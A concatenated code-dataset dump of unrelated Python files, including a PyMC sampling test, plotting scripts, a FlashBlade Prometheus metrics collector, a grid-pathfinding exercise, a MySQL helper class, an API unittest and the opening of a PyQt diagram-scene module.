size=3)\n chol, corr, stds = pm.LKJCholeskyCov( # pylint: disable=unpacking-non-sequence\n \"chol_packed\", n=3, eta=2, sd_dist=sd_dist, compute_corr=True\n )\n chol_packed = model[\"chol_packed\"]\n chol = pm.Deterministic(\"chol\", chol)\n obs = pm.MvNormal(\"obs\", mu=mu, chol=chol, observed=np.zeros(3))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol_packed, chol],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"chol_packed\", \"chol\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"chol\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol_packed],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"chol_packed\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"chol_packed\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == set()\n assert {i.name for i in self.get_function_roots(f)} == set()\n\n\ndef test_get_seeds_per_chain():\n ret = _get_seeds_per_chain(None, chains=1)\n assert len(ret) == 1 and isinstance(ret[0], int)\n\n ret = _get_seeds_per_chain(None, chains=2)\n assert len(ret) == 2 and isinstance(ret[0], int)\n\n ret = _get_seeds_per_chain(5, chains=1)\n assert ret == (5,)\n\n ret = _get_seeds_per_chain(5, chains=3)\n assert len(ret) == 3 and isinstance(ret[0], int) and not any(r == 5 for r in ret)\n\n rng = np.random.default_rng(123)\n expected_ret = rng.integers(2**30, dtype=np.int64, size=1)\n rng = np.random.default_rng(123)\n ret = _get_seeds_per_chain(rng, chains=1)\n assert ret == expected_ret\n\n rng = np.random.RandomState(456)\n expected_ret = rng.randint(2**30, dtype=np.int64, size=2)\n rng = np.random.RandomState(456)\n ret = _get_seeds_per_chain(rng, chains=2)\n assert np.all(ret == expected_ret)\n\n for expected_ret in ([0, 1, 2], (0, 1, 2, 3), np.arange(5)):\n ret = _get_seeds_per_chain(expected_ret, chains=len(expected_ret))\n assert ret is expected_ret\n\n with pytest.raises(ValueError, match=\"does not match the number of chains\"):\n _get_seeds_per_chain(expected_ret, chains=len(expected_ret) + 1)\n\n with pytest.raises(ValueError, match=re.escape(\"The `seeds` must be array-like\")):\n _get_seeds_per_chain({1: 1, 2: 2}, 2)\n","sub_path":"pymc/tests/test_sampling.py","file_name":"test_sampling.py","file_ext":"py","file_size_in_byte":65879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640917338","text":"import sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n df = pd.read_csv('../../data/Lifetime.csv',names=['dCETime','iSttsP','iSttsD','iSttsX',\"dValTemp\",'Par0','ePar0','Par1','ePar1','Par2','ePar2'])\n plt.figure(num=None, figsize=(12, 6.5), dpi=300, facecolor='w', edgecolor='k')\n plt.rcParams['font.size'] = 20\n dfE = df[(df[\"iSttsD\"] > 5)]\n plt.errorbar(dfE['dValTemp'],dfE['Par2'],xerr=0.1,yerr=dfE['ePar2'],fmt='bo',ecolor='black',capsize=2)\n plt.title('$R_{BG}$ vs Temperature')\n plt.ylabel('$R_{BG}$[Counts/100msec]')\n plt.xlabel('Temperature[℃]')\n #plt.legend(loc='upper right') #upper or lower\n plt.tight_layout()\n plt.savefig(\"../figure/plotBGvsTemp.png\")\n #plt.show()\n","sub_path":"plot/plotBGvsTemp.py","file_name":"plotBGvsTemp.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652499824","text":"n=input(\"\")\r\nka=int(n)\r\nwhile ka>=1:\r\n ls2=[]\r\n inp=str(input(\"\"))\r\n spl=inp.split(\" \")\r\n n=int(spl[0])\r\n k=int(spl[1])\r\n inp2=str(input(\"\"))\r\n spl2=inp2.split()\r\n nmk=int(spl2[k-1])\r\n for i in spl2: \r\n ok=int(i)\r\n if ok>=nmk:\r\n ls2.append(i)\r\n print(len(ls2))\r\n ka-=1\r\n","sub_path":"Koduesi/Qualification.py","file_name":"Qualification.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113703211","text":"import urllib3\nimport six\nfrom purity_fb import PurityFb, rest\n\n# import third party modules\nfrom prometheus_client.core import GaugeMetricFamily, InfoMetricFamily\n\n# disable ceritificate warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nclass FlashbladeCollector():\n \"\"\"\n Instantiates the collector's methods and properties to retrieve status,\n space occupancy and performance metrics from Puretorage FlasBlade.\n Provides also a 'collect' method to allow Prometheus client registry\n to work properly.\n :param target: IP address or domain name of the target array's management\n interface.\n :type target: str\n :param api_token: API token of the user with which to log in.\n :type api_token: str\n \"\"\"\n def __init__(self, target, api_token, request = 'all'):\n # self.fb = PurityFb(endpoint, conn_timeo=ctimeo, read_timeo=rtimeo, retries=retries)\n self.fb = PurityFb(host=target)\n self.fb.disable_verify_ssl()\n self.fb._api_client.user_agent = 'Purity_FB_Prometheus_exporter/1.0'\n self.fb.request_timeout = urllib3.Timeout(connect=2.0, read=60.0)\n self.fb.login(api_token)\n self.request = request\n self.filesystems = self.fb.file_systems.list_file_systems()\n self.buckets = self.fb.buckets.list_buckets()\n\n\n def __del__(self):\n if self.fb is not None:\n self.fb.logout()\n\n def array_info(self):\n \"\"\"Assemble a simple information metric defining the scraped system.\"\"\"\n data = self.fb.arrays.list_arrays().items[0]\n\n yield InfoMetricFamily(\n 'purefb',\n 'FlashBlade system information',\n value={\n 'array_name': data.name,\n 'system_id': data.id,\n 'os': data.os,\n 'version': data.version\n })\n\n def array_hw(self):\n \"\"\"\n Create a metric of gauge type for components status,\n with the hardware component name as label.\n Metrics values can be iterated over.\n \"\"\"\n fb_hw = self.fb.hardware.list_hardware().items\n status = GaugeMetricFamily('purefb_hw_status',\n 'Hardware components status',\n labels=['hw_id'])\n for h in fb_hw:\n state = h.status\n name = h.name\n labels_v = [name]\n if state == 'unused' or state == 'not_installed':\n continue\n elif state == 'healthy':\n status.add_metric(labels_v, 1)\n else:\n status.add_metric(labels_v, 0)\n yield status\n\n def array_events(self):\n \"\"\"\n Create a metric of gauge type for the number of open alerts:\n critical, warning and info, with the severity as label.\n Metrics values can be iterated over.\n \"\"\"\n fb_events = self.fb.alerts.list_alerts(filter=\"state='open'\").items\n labels = ['severity']\n events = GaugeMetricFamily('purefb_open_events_total',\n 'FlashBlade number of open events',\n labels=labels)\n\n # Inrement each counter for each type of event\n c_crit, c_warn, c_info = 0, 0, 0\n for msg in fb_events:\n if msg.severity == 'critical':\n c_crit += 1\n if msg.severity == 'warning':\n c_warn += 1\n if msg.severity == 'info':\n c_info += 1\n events.add_metric(['critical'], c_crit)\n events.add_metric(['warning'], c_warn)\n events.add_metric(['info'], c_info)\n yield events\n\n\n def array_space(self):\n \"\"\"\n Create metrics of gauge type for array space indicators.\n Metrics values can be iterated over.\n \"\"\"\n fb_space = self.fb.arrays.list_arrays_space().items[0]\n data_reduction = GaugeMetricFamily('purefb_array_space_data_reduction',\n 'FlashBlade overall data reduction',\n labels=[])\n space = GaugeMetricFamily('purefb_array_space_bytes',\n 'FlashBlade total space capacity',\n labels=['dimension'])\n data_reduction.add_metric([], fb_space.space.data_reduction)\n space.add_metric(['capacity'], fb_space.capacity)\n space.add_metric(['total_physical'], fb_space.space.total_physical)\n space.add_metric(['snapshots'], fb_space.space.snapshots)\n yield data_reduction\n yield space\n\n\n def buckets_space(self):\n \"\"\"\n Create metrics of gauge type for buckets space indicators, with the\n account name and the bucket name as labels.\n Metrics values can be iterated over.\n \"\"\"\n datareduction = GaugeMetricFamily('purefb_buckets_data_reduction',\n 'FlashBlade buckets data reduction',\n labels=['account', 'name'])\n objcount = GaugeMetricFamily('purefb_buckets_object_count',\n 'FlashBlade buckets objects counter',\n labels=['account', 'name'])\n space = GaugeMetricFamily('purefb_buckets_space_bytes',\n 'FlashBlade buckets space',\n labels=['account', 'name', 'dimension'])\n for b in self.buckets.items:\n if b.space.data_reduction is None:\n b.space.data_reduction = 0\n datareduction.add_metric([b.account.name, b.name],\n b.space.data_reduction)\n objcount.add_metric([b.account.name, b.name], b.object_count)\n space.add_metric([b.account.name, b.name, 'snapshots'], b.space.snapshots)\n space.add_metric([b.account.name, b.name, 'total_physical'],\n b.space.total_physical)\n space.add_metric([b.account.name, b.name, 'virtual'], b.space.virtual)\n space.add_metric([b.account.name, b.name, 'unique'], b.space.unique)\n yield datareduction\n yield objcount\n yield space\n\n def filesystems_space(self):\n \"\"\"\n Create metrics of gauge type for filesystems space indicators,\n with filesystem name as label.\n Metrics values can be iterated over.\n \"\"\"\n datareduction = GaugeMetricFamily('purefb_filesystems_data_reduction',\n 'FlashBlade filesystems data reduction',\n labels=['name'])\n space = GaugeMetricFamily('purefb_filesystems_space_bytes',\n 'FlashBlade filesystems space',\n labels=['name', 'dimension'])\n for f in self.filesystems.items:\n if f.space.data_reduction is None:\n f.space.data_reduction = 0\n datareduction.add_metric([f.name], f.space.data_reduction)\n space.add_metric([f.name, 'provisioned'], f.provisioned)\n space.add_metric([f.name, 'snapshots'], f.space.snapshots)\n space.add_metric([f.name, 'total_physical'], f.space.total_physical)\n space.add_metric([f.name, 'virtual'], f.space.virtual)\n space.add_metric([f.name, 'unique'], f.space.unique)\n yield datareduction\n yield space\n\n def array_perf(self):\n \"\"\"\n Create array performance metrics of gauge type.\n Metrics values can be iterated over.\n \"\"\"\n protocols = ['http', 'nfs', 's3', 'smb']\n bpops = GaugeMetricFamily('purefb_array_performance_opns_bytes',\n 'FlashBlade array average bytes per operations',\n labels=['protocol', 'dimension'])\n latency = GaugeMetricFamily('purefb_array_performance_latency_usec',\n 'FlashBlade array latency',\n labels=['protocol', 'dimension'])\n iops = GaugeMetricFamily('purefb_array_performance_iops',\n 'FlashBlade array IOPS',\n labels=['protocol', 'dimension'])\n throughput = GaugeMetricFamily('purefb_array_performance_throughput_bytes',\n 'FlashBlade array throughput',\n labels=['protocol', 'dimension'])\n\n for proto in protocols:\n fb_perf = self.fb.arrays.list_arrays_performance(protocol=proto).items[0]\n\n bpops.add_metric([proto, 'per_op'], fb_perf.bytes_per_op)\n bpops.add_metric([proto, 'read'], fb_perf.bytes_per_read)\n bpops.add_metric([proto, 'write'], fb_perf.bytes_per_write)\n latency.add_metric([proto, 'read'], fb_perf.usec_per_read_op)\n latency.add_metric([proto, 'write'], fb_perf.usec_per_write_op)\n latency.add_metric([proto, 'other'], fb_perf.usec_per_other_op)\n iops.add_metric([proto, 'read'], fb_perf.reads_per_sec)\n iops.add_metric([proto, 'write'], fb_perf.writes_per_sec)\n iops.add_metric([proto, 'other'], fb_perf.others_per_sec)\n #iops.add_metric([proto, 'in'], fb_perf.input_per_sec)\n #iops.add_metric([proto, 'out'], fb_perf.output_per_sec)\n throughput.add_metric([proto, 'read'], fb_perf.read_bytes_per_sec)\n throughput.add_metric([proto, 'write'], fb_perf.write_bytes_per_sec)\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def filesystems_perf(self):\n \"\"\"\n Create metrics of gauge type for filesystems performance indicators,\n with filesystem name as label.\n Metrics values can be iterated over.\n \"\"\"\n\n bpops = GaugeMetricFamily('purefb_filesystem_performance_opns_bytes',\n 'FlashBlade filesystem average bytes per operations',\n labels=['protocol', 'name', 'dimension'])\n latency = GaugeMetricFamily('purefb_filesystem_performance_latency_usec',\n 'FlashBlade filesystem latency',\n labels=['protocol', 'name', 'dimension'])\n iops = GaugeMetricFamily('purefb_filesystem_performance_iops',\n 'FlashBlade filesystem IOPS',\n labels=['protocol', 'name', 'dimension'])\n throughput = GaugeMetricFamily('purefb_filesystem_performance_throughput_bytes',\n 'FlashBlade filesystem throughput',\n labels=['protocol', 'name', 'dimension'])\n for f in self.filesystems.items:\n if not f.nfs.enabled:\n continue\n fb_fs_perf = None\n try:\n fb_fs_perf = self.fb.file_systems.list_file_systems_performance(protocol='nfs',names=[f.name]).items[0]\n except Exception as e:\n continue\n bpops.add_metric(['nfs', f.name, 'per_op'], fb_fs_perf.bytes_per_op)\n bpops.add_metric(['nfs', f.name, 'read'], fb_fs_perf.bytes_per_read)\n bpops.add_metric(['nfs', f.name, 'write'], fb_fs_perf.bytes_per_write)\n latency.add_metric(['nfs', f.name, 'read'], fb_fs_perf.usec_per_read_op)\n latency.add_metric(['nfs', f.name, 'write'], fb_fs_perf.usec_per_write_op)\n latency.add_metric(['nfs', f.name, 'other'], fb_fs_perf.usec_per_other_op)\n iops.add_metric(['nfs', f.name, 'read'], fb_fs_perf.reads_per_sec)\n iops.add_metric(['nfs', f.name, 'write'], fb_fs_perf.writes_per_sec)\n iops.add_metric(['nfs', f.name, 'other'], fb_fs_perf.others_per_sec)\n throughput.add_metric(['nfs', f.name, 'read'], fb_fs_perf.read_bytes_per_sec)\n throughput.add_metric(['nfs', f.name, 'write'], fb_fs_perf.write_bytes_per_sec)\n\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def buckets_perf(self):\n \"\"\"\n Create metrics of gauge type for buckets performace indicators, with the\n account name and the bucket name as labels.\n Metrics values can be iterated over.\n \"\"\"\n latency = GaugeMetricFamily('purefb_bucket_performance_latency_usec',\n 'FlashBlade bucket latency',\n labels=['name', 'dimension'])\n throughput = GaugeMetricFamily('purefb_bucket_performance_throughput_bytes',\n 'FlashBlade bucket throughput',\n labels=['name', 'dimension'])\n\n for b in self.buckets.items:\n try:\n bperf = self.fb.buckets.list_buckets_s3_specific_performance(names=[b.name]).items[0]\n except Exception as e:\n continue\n #bperf = self.fb.buckets.list_buckets_performance(names=[b.name])\n latency.add_metric([b.name, 'read_buckets'], bperf.usec_per_read_bucket_op)\n latency.add_metric([b.name, 'read_objects'], bperf.usec_per_read_object_op)\n latency.add_metric([b.name, 'write_buckets'], bperf.usec_per_write_bucket_op)\n latency.add_metric([b.name, 'write_objects'], bperf.usec_per_write_object_op)\n latency.add_metric([b.name, 'other'], bperf.usec_per_other_op)\n throughput.add_metric([b.name, 'read_buckets'], bperf.read_buckets_per_sec)\n throughput.add_metric([b.name, 'read_objects'], bperf.read_objects_per_sec)\n throughput.add_metric([b.name, 'write_buckets'], bperf.write_buckets_per_sec)\n throughput.add_metric([b.name, 'write_objects'], bperf.write_objects_per_sec)\n throughput.add_metric([b.name, 'other'], bperf.others_per_sec)\n\n yield latency\n yield throughput\n\n def clientperf(self):\n \"\"\"\n Create metrics of gauge type for client performance metrics.\n Metrics values can be iterated over.\n \"\"\"\n fb_clientperf = self.fb.arrays.list_clients_performance()\n bpops = GaugeMetricFamily('purefb_client_performance_opns_bytes',\n 'FlashBlade client average bytes per operations',\n labels=['name', 'port', 'dimension'])\n latency = GaugeMetricFamily('purefb_client_performance_latency_usec',\n 'FlashBlade latency',\n labels=['name', 'port', 'dimension'])\n iops = GaugeMetricFamily('purefb_client_performance_iops',\n 'FlashBlade IOPS',\n labels=['name', 'port', 'dimension'])\n throughput = GaugeMetricFamily('purefb_client_performance_throughput_bytes',\n 'FlashBlade client_throughput',\n labels=['name', 'port', 'dimension'])\n\n for cperf in fb_clientperf.items:\n client, port = cperf.name.split(':')\n bpops.add_metric([client, port, 'per_op'], cperf.bytes_per_op)\n bpops.add_metric([client, port, 'read'], cperf.bytes_per_read)\n bpops.add_metric([client, port, 'write'], cperf.bytes_per_write)\n iops.add_metric([client, port, 'read'], cperf.reads_per_sec)\n iops.add_metric([client, port, 'write'], cperf.writes_per_sec)\n iops.add_metric([client, port, 'other'], cperf.others_per_sec)\n latency.add_metric([client, port, 'read'], cperf.usec_per_read_op)\n latency.add_metric([client, port, 'write'], cperf.usec_per_write_op)\n latency.add_metric([client, port, 'other'], cperf.usec_per_other_op)\n throughput.add_metric([client, port, 'read'], cperf.read_bytes_per_sec)\n throughput.add_metric([client, port, 'write'], cperf.write_bytes_per_sec)\n\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def collect(self):\n \"\"\"Global collector method for all the collected array metrics.\"\"\"\n if (self.request == 'all' or self.request == 'array'):\n yield from self.array_info()\n yield from self.array_hw()\n yield from self.array_events()\n yield from self.array_perf()\n yield from self.array_space()\n yield from self.filesystems_space()\n yield from self.buckets_space()\n yield from self.filesystems_perf()\n yield from self.buckets_perf()\n if (self.request == 'all' or self.request == 'clients'):\n yield from self.clientperf()\n","sub_path":"collectors/flashblade.py","file_name":"flashblade.py","file_ext":"py","file_size_in_byte":16859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"374460756","text":"# ----------\n# User Instructions:\n# \n# Create a function compute_value which returns\n# a grid of values. The value of a cell is the minimum\n# number of moves required to get from the cell to the goal. \n#\n# If a cell is a wall or it is impossible to reach the goal from a cell,\n# assign that cell a value of 99.\n# ----------\n\ngrid = [[0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0]]\n\ngoal = [len(grid)-1, len(grid[0])-1]\ncost = 1 # the cost associated with moving from a cell to an adjacent one\n\ndelta = [[-1, 0 ], # go up\n [ 0, -1], # go left\n [ 1, 0 ], # go down\n [ 0, 1 ]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\ndef get_minimum_cost(dynamic_grid, x, y):\n value = 999999\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(dynamic_grid[0]) or new_y < 0 or new_y >= len(dynamic_grid):\n continue\n\n if dynamic_grid[new_y][new_x] < value:\n value = dynamic_grid[new_y][new_x]\n\n return value\n\ndef get_optimal_turn(dynamic_grid, x, y):\n if dynamic_grid[y][x] == 99:\n return ' '\n\n value = 99999\n turn = ' '\n\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(dynamic_grid[0]) or new_y < 0 or new_y >= len(dynamic_grid):\n continue\n\n if dynamic_grid[new_y][new_x] < value:\n value = dynamic_grid[new_y][new_x]\n turn = delta_name[i]\n\n return turn\n\ndef compute_cell_values(grid, dynamic_grid, cost, x, y):\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(grid[0]) or new_y < 0 or new_y >= len(grid):\n continue\n\n if grid[new_y][new_x] == 1:\n new_cost = 99\n else:\n new_cost = min(get_minimum_cost(dynamic_grid, new_x, new_y) + 1, 99)\n\n # if the cost doesn't change, no need to recount the neighbours\n if new_cost >= dynamic_grid[new_y][new_x]:\n continue\n else:\n dynamic_grid[new_y][new_x] = new_cost\n\n compute_cell_values(grid, dynamic_grid, cost, new_x, new_y)\n\ndef compute_value(grid, goal, cost):\n dynamic_grid = [[99 for row in range(len(grid[0]))] for col in range(len(grid))]\n\n dynamic_grid[goal[0]][goal[1]] = 0\n compute_cell_values(grid, dynamic_grid, cost, goal[1], goal[0]) \n return dynamic_grid\n\ndef optimum_policy(grid, goal, cost):\n optimal_turns = [[' ' for row in range(len(grid[0]))] for col in range(len(grid))]\n\n dynamic_grid = compute_value(grid, goal, cost)\n\n for y in range(len(dynamic_grid)):\n for x in range(len(dynamic_grid[y])):\n if goal[0] == y and goal[1] == x:\n optimal_turns[y][x] = \"*\"\n else:\n optimal_turns[y][x] = get_optimal_turn(dynamic_grid, x, y)\n\n return optimal_turns \n\nval = optimum_policy(grid, goal, cost)\nfor i in range(len(val)):\n print(val[i])\n","sub_path":"lesson4/dynamic_programming_2.py","file_name":"dynamic_programming_2.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"91818240","text":"import pymysql\r\n\r\nclass mysqlhelper:\r\n\r\n def getCon(self):\r\n try:\r\n conn = pymysql.connect(host='localhost', user='root', passwd='mysql', db='test', port=3306, charset='utf8')\r\n #print(\"数据库连接成功\")\r\n return conn\r\n except pymysql.Error as e:\r\n print(\"数据库连接失败,%s\"% e)\r\n\r\n def select(self,sql):\r\n try:\r\n con=self.getCon()\r\n #print(con)\r\n #cur = con.cursor(pymysql.cursors.DictCursor)\r\n cur=con.cursor()\r\n cur.execute(sql)\r\n fc=cur.fetchall()\r\n return fc\r\n except pymysql.Error as e:\r\n print(\"查询失败,请检查数据库!,%s\"% e)\r\n finally:\r\n cur.close()\r\n con.close()\r\n\r\n def select_psword(self, sql,param):\r\n try:\r\n con = self.getCon()\r\n # print(con)\r\n #cur = con.cursor(pymysql.cursors.DictCursor)\r\n cur = con.cursor()\r\n cur.execute(sql,param)\r\n fc = cur.fetchone()\r\n return fc\r\n except pymysql.Error as e:\r\n print(\"查询失败,请检查数据库!,%s\" % e)\r\n finally:\r\n cur.close()\r\n con.close()\r\n def update(self, sql, params):\r\n try:\r\n con = self.getCon()\r\n print(con)\r\n cur = con.cursor()\r\n count = cur.execute(sql, params)\r\n con.commit()\r\n #print(\"更新成功\")\r\n return count\r\n except pymysql.Error as e:\r\n print(\"更新失败,请检查数据库!,%s\"% e)\r\n\r\n finally:\r\n cur.close()\r\n con.close()\r\n\r\n\r\n\r\n","sub_path":"DBHelper/MysqldbHelper.py","file_name":"MysqldbHelper.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223406646","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom matplotlib.font_manager import FontProperties\nimport sys\n\n\nimport readcsv\nimport plot_utils\n\n\n\nif len(sys.argv) > 1:\n filename = sys.argv[1]\n\ncsv = readcsv.parse_to_dir_list(filename)\n\n# all columns in trainAndTest are:\n# test FPR,threads_per_datapoint,runs,train Error,name,train TPR,train FPR,\n# test TPR,epochs,step_size,test Error,datapoints_per_block,tolerance,train time\n\n\n# this will represent the different\n# cols_to_merge_with_name = [\"threads_per_datapoint\", \"datapoints_per_block\"]\ncols_to_merge_with_name = [\"datapoints_per_block\"]\n\ncol_x_axis = \"threads_per_datapoint\"\ncols_y_axis = [\"train time\"]\n\n\nfor col_y_axis in cols_y_axis:\n lines = {}\n # print(col_y_axis)\n for idx, _ in enumerate(csv[\"name\"]):\n line_name = plot_utils.get_line_name(idx, csv, cols_to_merge_with_name)\n\n if line_name not in lines:\n lines[line_name] = {'x':[], 'y':[]}\n\n lines[line_name]['x'].append(csv[col_x_axis][idx])\n lines[line_name]['y'].append(csv[col_y_axis][idx])\n\n plot_utils.adapt_baselines(lines)\n\n ax = plt.subplot(1, 1, 1)\n\n plot_utils.plot(lines, col_x_axis, col_y_axis, ax)\n\nplt.show(block=False)\n\nraw_input(\"press enter to close\")\n\nplt.close(\"all\")\n","sub_path":"scripts/plot_time.py","file_name":"plot_time.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243628963","text":"import requests\nimport json\nimport unittest\nfrom test_case import public1\nlist=[]\nclass Material(unittest.TestCase):\n def test_Material_Collection(self):\n headers={\"Authorization\":public1.token_syjc(),\n \"Content-Type\":\"application/json\"}\n url=\"http://10.1.0.213:30114/user/permission-collect-materials\"\n payload={\n \"materialsUuid\":\"TI_SN74LVTH541NS\",\n \"platformType\":\n {\n \"value\":\"1\"\n }\n }\n data_json=json.dumps(payload)\n response=requests.post(url=url,data=data_json,headers=headers)\n # response = requests.post(url=url, json=payload, headers=headers)\n print(response.json())\n list.append(response.json())\n print(list)\n print(list[0][\"msg\"])\n self.assertEqual(list[0][\"msg\"],\"SUCCESS\")\n\n# # 构造测试集\n# def suite():\n# suite=unittest.TestSuite()\n# suite.addTest(Material(\"test_Material_Collection\"))\n# return suite\n\n# 测试\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","sub_path":"test_case/test_Material_Collection2.py","file_name":"test_Material_Collection2.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188513599","text":"#!/usr/bin/env python\n\n# This is only needed for Python v2 but is harmless for Python v3.\n#\n# 2010 - Mitja: apparently this is only necessary if run as main class:\nif __name__ == '__main__':\n import sip\n sip.setapi('QString', 2)\n\n\n# 2010 - Mitja:\nimport inspect # for debugging functions, remove in final version\n# debugging functions, remove in final version\ndef debugWhoIsTheRunningFunction():\n return inspect.stack()[1][3]\ndef debugWhoIsTheParentFunction():\n return inspect.stack()[2][3]\n\n\n\n# 2012 - Mitja: advanced debugging tools,\n# work only on Posix-compliant systems so far (no MS-Windows)\n# commented out for now:\n#\n# def dumpstacks(signal, frame):\n# id2name = dict([(th.ident, th.name) for th in threading.enumerate()])\n# code = []\n# for threadId, stack in sys._current_frames().items():\n# code.append(\"\\n# Thread: %s(%d)\" % (id2name.get(threadId,\"\"), threadId))\n# for filename, lineno, name, line in traceback.extract_stack(stack):\n# code.append('File: \"%s\", line %d, in %s' % (filename, lineno, name))\n# if line:\n# code.append(\" %s\" % (line.strip()))\n# CDConstants.printOut(str(\"\\n\".join(code)) , CDConstants.DebugTODO )\n\n\n# 2012 - Mitja: advanced debugging tools,\n# work only on Posix-compliant systems so far (no MS-Windows)\n# commented out for now:\n#\n# import signal\n# \n# signal.signal(signal.SIGQUIT, dumpstacks)\n\n\n\n\n\n\n\n\n\nimport sys # sys is necessary to inquire about \"sys.platform\" and \"sys.version_info\"\n\nimport math\n\n# 2010 - Mitja: for cut/copy/paste operations on scene items,\n# we would need deepcopy, if it worked with Qt objects, but it doesn't.\n# import copy\n\nfrom PyQt4 import QtCore, QtGui\n\n# --> --> --> mswat code added to run in MS Windows --> --> -->\n# --> --> --> mswat code added to run in MS Windows --> --> -->\nimport PyQt4.QtCore\nimport PyQt4.QtGui\nimport PyQt4\n# <-- <-- <-- mswat code added to run in MS Windows <-- <-- <--\n# <-- <-- <-- mswat code added to run in MS Windows <-- <-- <--\n\n# 2011 - Mitja: external class defining all global constants for CellDraw:\nfrom cdConstants import CDConstants\n\n# 2011 - Mitja: external class for drawing an image layer on a QGraphicsScene:\nfrom cdImageLayer import CDImageLayer\n\n# 2011 - Mitja: external class for handling a sequence of images:\nfrom cdImageSequence import CDImageSequence\n\n# 2011 - Mitja: external class for buttons, labels, etc:\nfrom cdControlPanel import CDControlPanel\n\n# 2011 - Mitja: external class for controlling image picking mode: buttons/sliders:\nfrom cdControlInputImage import CDControlInputImage\n\n# 2011 - Mitja: external class for accessing image sequence controls:\nfrom cdControlImageSequence import CDControlImageSequence\n\n# 2011 - Mitja: external class for accessing clusters controls:\nfrom cdControlClusters import CDControlClusters\n\n# 2011 - Mitja: external class for controlling drawing toggle: regions vs. cells:\nfrom cdControlRegionOrCell import CDControlRegionOrCell\n\n# 2011 - Mitja: external class for selecting layer mode:\nfrom cdControlLayerSelection import CDControlLayerSelection\n\n# 2011 - Mitja: external class for scene scale / zoom control:\nfrom cdControlSceneScaleZoom import CDControlSceneScaleZoom\n\n# 2011 - Mitja: external class for scene item edit controls:\nfrom cdControlSceneItemEdit import PIFControlSceneItemEdit\n\n# 2011 - Mitja: external class for setting types of regions and cells:\nfrom cdControlTypes import CDControlTypes\n\n# 2011 - Mitja: # CDSceneAssistant - starting assistant/wizard for CellDraw\nfrom cdSceneAssistant import CDSceneAssistant\n\n\n\n# the following import is about a resource file generated thus:\n# \"pyrcc4 cdDiagramScene.qrc -o cdDiagramScene_rc.py\"\n# which requires the file cdDiagramScene.qrc to correctly point to the files in \":/images\"\n# only that way will the icons etc. be available after the import:\nimport cdDiagramScene_rc\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass Arrow(QtGui.QGraphicsLineItem):\n def __init__(self, startItem, endItem, parent=None, scene=None):\n super(Arrow, self).__init__(parent, scene)\n\n self.arrowHead = QtGui.QPolygonF()\n\n self.myStartItem = startItem\n self.myEndItem = endItem\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n self.myColor = QtCore.Qt.black\n self.setPen(QtGui.QPen(self.myColor, 2.0, QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))\n\n def setColor(self, color):\n self.myColor = color\n\n def startItem(self):\n return self.myStartItem\n\n def endItem(self):\n return self.myEndItem\n\n def boundingRect(self):\n extra = (self.pen().width() + 20) / 2.0\n p1 = self.line().p1()\n p2 = self.line().p2()\n return QtCore.QRectF(p1, QtCore.QSizeF(p2.x() - p1.x(), p2.y() - p1.y())).normalized().adjusted(-extra, -extra, extra, extra)\n\n def shape(self):\n path = super(Arrow, self).shape()\n path.addPolygon(self.arrowHead)\n return path\n\n def updatePosition(self):\n line = QtCore.QLineF(self.mapFromItem(self.myStartItem, 0, 0), self.mapFromItem(self.myEndItem, 0, 0))\n self.setLine(line)\n\n def paint(self, painter, option, widget=None):\n if (self.myStartItem.collidesWithItem(self.myEndItem)):\n return\n\n myStartItem = self.myStartItem\n myEndItem = self.myEndItem\n myColor = self.myColor\n myPen = self.pen()\n myPen.setColor(self.myColor)\n arrowSize = 20.0\n painter.setPen(myPen)\n painter.setBrush(self.myColor)\n\n centerLine = QtCore.QLineF(myStartItem.pos(), myEndItem.pos())\n endPolygon = myEndItem.polygon()\n p1 = endPolygon.first() + myEndItem.pos()\n\n intersectPoint = QtCore.QPointF()\n for i in endPolygon:\n p2 = i + myEndItem.pos()\n polyLine = QtCore.QLineF(p1, p2)\n 